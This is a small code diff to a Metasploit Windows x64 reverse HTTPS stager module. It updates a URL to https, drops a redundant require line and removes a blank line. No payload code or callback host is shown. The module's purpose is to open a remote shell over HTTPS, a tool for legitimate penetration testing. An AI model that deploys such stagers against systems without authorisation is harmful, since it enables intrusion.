@@ -1,9 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'msf/core/handler/reverse_https'
 require 'msf/core/payload/windows/x64/reverse_winhttps'
 
@@ -31,5 +30,4 @@ module MetasploitModule
       'Convention'  => 'sockrdi https',
       'Stager'      => { 'Payload' => '' }))
   end
-
 end
